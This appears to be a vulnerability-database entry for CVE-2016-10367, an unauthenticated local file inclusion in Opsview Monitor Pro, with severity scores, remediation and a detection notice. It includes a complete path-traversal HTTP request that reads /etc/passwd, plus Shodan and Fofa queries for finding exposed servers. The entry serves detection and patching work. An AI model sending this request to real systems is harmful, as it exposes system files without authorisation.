🔙 목록으로 돌아가기

CVE-2016-10367: Opsview Monitor Pro - Local File Inclusion

TitleOpsview Monitor Pro - Local File Inclusion
Author0x_akoko
SeverityHigh
ImpactAn attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
RemediationUpgrade to the latest version of Opsview Monitor Pro to fix the local file inclusion vulnerability.
CVSS Score7.5
EPSS Score0.52468
CVE IDCVE-2016-10367
CWE IDCWE-22
Shodan Querytitle:"Opsview"http.title:"opsview"
Fofa Querytitle="opsview"
Tags cve2016 cve opsview lfi vkev vuln

🔍 Vulnerability Description

Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass.

🌐 HTTP Request

GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-10367.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-10367.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A